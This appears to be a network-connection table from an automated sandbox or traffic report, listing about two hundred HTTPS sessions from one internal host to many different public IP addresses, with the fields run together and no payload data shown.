                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11114192.168.2.1454314166.124.149.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11115192.168.2.144837876.232.128.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11116192.168.2.143363653.218.242.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11117192.168.2.1447862171.233.46.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11118192.168.2.144103098.3.225.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11119192.168.2.1457180101.150.81.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11120192.168.2.1460220180.240.223.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11121192.168.2.1453186178.202.232.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11122192.168.2.145377441.3.23.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11123192.168.2.1435382219.60.168.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11124192.168.2.1446516156.255.23.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11125192.168.2.1437774139.244.105.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11126192.168.2.144874427.208.224.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11127192.168.2.1450040204.6.181.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11128192.168.2.145696848.249.184.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11129192.168.2.145353465.150.12.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11130192.168.2.145995814.254.52.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11131192.168.2.143614899.59.19.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11132192.168.2.1460516155.26.255.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11133192.168.2.1455178101.221.204.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11134192.168.2.1443042125.178.40.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11135192.168.2.145696458.8.202.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11136192.168.2.143374645.111.210.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11137192.168.2.143819078.138.7.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11138192.168.2.143597659.146.93.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11139192.168.2.1437578136.199.36.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11140192.168.2.1440618149.131.173.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11141192.168.2.1458158204.210.23.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11142192.168.2.143644038.56.43.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11143192.168.2.1438088131.20.225.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11144192.168.2.1444002153.116.246.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11145192.168.2.1441654157.226.127.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11146192.168.2.14474384.83.202.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11147192.168.2.1435062180.140.185.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11148192.168.2.1437546152.128.13.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11149192.168.2.1433776187.214.99.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11150192.168.2.144943836.206.148.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11151192.168.2.1460404182.221.247.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11152192.168.2.1459782193.11.58.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11153192.168.2.14580209.148.183.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11154192.168.2.1458872151.56.236.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11155192.168.2.143697625.178.69.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11156192.168.2.1433392204.88.48.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11157192.168.2.143573245.190.8.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11158192.168.2.143703482.173.249.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11159192.168.2.1437748181.254.250.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11160192.168.2.1433232171.53.157.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11161192.168.2.144766441.94.57.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11162192.168.2.1450676175.206.99.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11163192.168.2.1443862151.253.26.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11164192.168.2.1453776162.19.117.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11165192.168.2.1452360130.238.32.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11166192.168.2.1454482207.254.57.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11167192.168.2.1460896132.18.48.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11168192.168.2.144543295.84.137.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11169192.168.2.145734661.88.71.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11170192.168.2.1460210180.2.99.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11171192.168.2.1441794140.181.29.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11172192.168.2.14586149.168.5.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11173192.168.2.143408263.232.42.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11174192.168.2.1451194114.39.59.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11175192.168.2.1440262166.82.227.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11176192.168.2.1443978147.11.113.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11177192.168.2.1460482191.201.248.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11178192.168.2.146052831.59.21.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11179192.168.2.1457374207.173.152.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11180192.168.2.145410872.56.60.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11181192.168.2.143329213.4.91.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11182192.168.2.1457628174.123.132.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11183192.168.2.145056837.147.224.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11184192.168.2.1453588203.37.214.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11185192.168.2.1454086145.72.98.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11186192.168.2.1447470212.47.79.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11187192.168.2.144639858.169.146.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11188192.168.2.144359248.120.128.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11189192.168.2.1434028157.152.130.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11190192.168.2.1445006126.102.42.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11191192.168.2.1435256103.67.0.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11192192.168.2.1437734205.109.78.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11193192.168.2.144006618.227.44.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11194192.168.2.1448928172.89.62.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11195192.168.2.1448510179.5.160.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11196192.168.2.1440228169.194.18.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11197192.168.2.1459320198.249.214.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11198192.168.2.1460986146.169.142.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11199192.168.2.1441984179.175.224.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11200192.168.2.1459152150.195.27.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11201192.168.2.1454078147.228.148.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11202192.168.2.145527262.170.193.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11203192.168.2.144510454.189.75.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11204192.168.2.145570473.62.254.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11205192.168.2.1451782223.116.207.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11206192.168.2.1437310164.243.238.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11207192.168.2.1435464193.173.28.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11208192.168.2.145846091.189.200.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11209192.168.2.1455046133.106.241.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11210192.168.2.144711670.202.102.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11211192.168.2.1439160216.208.215.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11212192.168.2.1457614115.232.212.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11213192.168.2.1449434149.105.169.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11214192.168.2.145219683.216.180.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11215192.168.2.1455864124.200.80.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11216192.168.2.143582618.198.186.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11217192.168.2.1445112101.218.215.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11218192.168.2.1436192109.149.204.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11219192.168.2.1454920115.120.124.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11220192.168.2.1457684160.92.240.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11221192.168.2.1456006138.60.75.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11222192.168.2.145398435.23.132.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11223192.168.2.1438602130.168.246.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11224192.168.2.1434532179.71.167.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11225192.168.2.144819035.92.138.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11226192.168.2.144728878.6.159.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11227192.168.2.1439280150.218.77.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11228192.168.2.1434008101.87.153.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11229192.168.2.145557624.199.127.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11230192.168.2.1434590179.161.237.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11231192.168.2.1459890170.94.74.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11232192.168.2.1446726137.235.117.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11233192.168.2.145965696.254.114.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11234192.168.2.143725412.176.76.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11235192.168.2.1441390151.67.29.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11236192.168.2.1452542123.217.40.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11237192.168.2.1438854174.19.11.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11238192.168.2.145538051.155.253.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11239192.168.2.1435624129.123.146.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11240192.168.2.145545643.15.33.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11241192.168.2.14441749.74.201.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11242192.168.2.1443692165.73.158.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11243192.168.2.1453618216.112.150.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11244192.168.2.1437460105.37.24.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11245192.168.2.145119475.177.132.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11246192.168.2.1445788200.113.30.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11247192.168.2.1453630213.52.158.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11248192.168.2.143291234.2.31.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11249192.168.2.1437738113.254.239.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11250192.168.2.1433996101.137.44.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11251192.168.2.1438616174.109.9.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11252192.168.2.1439634186.117.43.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11253192.168.2.1447058213.102.97.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11254192.168.2.143932478.152.8.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11255192.168.2.1452198204.60.76.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11256192.168.2.1442302200.90.83.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11257192.168.2.1434082106.51.152.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11258192.168.2.1444916208.184.214.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11259192.168.2.1455130111.25.191.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11260192.168.2.1435750153.31.24.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11261192.168.2.14589628.53.62.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11262192.168.2.144412220.36.38.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11263192.168.2.1453680152.172.136.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11264192.168.2.144171243.22.202.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11265192.168.2.1434506183.183.41.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11266192.168.2.144228698.251.55.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11267192.168.2.1451892146.64.13.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11268192.168.2.1438752163.232.93.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11269192.168.2.144535653.24.11.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11270192.168.2.144582227.255.223.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11271192.168.2.1437136145.19.147.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11272192.168.2.1437262213.125.29.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11273192.168.2.144905227.55.82.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11274192.168.2.1439454119.88.240.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11275192.168.2.1435442137.120.77.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11276192.168.2.1457408159.109.177.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11277192.168.2.1433376219.219.63.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11278192.168.2.1447598184.101.194.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11279192.168.2.1445866116.85.146.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11280192.168.2.1458064131.32.211.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11281192.168.2.143660883.219.185.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11282192.168.2.1436244148.22.125.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11283192.168.2.1442148147.183.179.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11284192.168.2.143747643.71.227.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11285192.168.2.145626041.251.93.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11286192.168.2.1446220180.48.198.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11287192.168.2.1439340150.102.52.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11288192.168.2.1440718123.61.130.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11289192.168.2.144046284.24.188.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11290192.168.2.1439378201.199.229.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11291192.168.2.144509260.211.133.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11292192.168.2.145782470.61.159.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11293192.168.2.1433658147.231.234.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11294192.168.2.1451266158.116.185.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11295192.168.2.143897657.197.179.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11296192.168.2.1448910164.180.170.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11297192.168.2.1434086103.99.251.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11298192.168.2.1441884174.222.101.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11299192.168.2.144661837.153.223.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11300192.168.2.144969295.156.31.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11301192.168.2.145467412.222.227.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11302192.168.2.1458676198.62.236.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11303192.168.2.1442042121.20.117.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11304192.168.2.143859264.111.38.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11305192.168.2.1436394131.144.55.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11306192.168.2.1451750111.116.203.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11307192.168.2.1459492122.2.206.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11308192.168.2.143420849.7.107.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11309192.168.2.1456202208.202.150.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11310192.168.2.144414892.215.151.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11311192.168.2.146015232.153.179.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11312192.168.2.143632471.152.44.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11313192.168.2.1439890119.234.184.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11314192.168.2.1440956100.63.71.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11315192.168.2.144677278.95.60.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11316192.168.2.143337680.29.4.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11317192.168.2.1437668175.67.41.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11318192.168.2.145774238.135.4.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11319192.168.2.1451856194.250.215.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11320192.168.2.144437447.91.205.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11321192.168.2.1437870109.215.233.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11322192.168.2.1437966103.27.238.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11323192.168.2.145447653.87.245.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11324192.168.2.145666625.103.180.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11325192.168.2.1438684207.16.10.106443
                                                      TimestampBytes transferredDirectionData


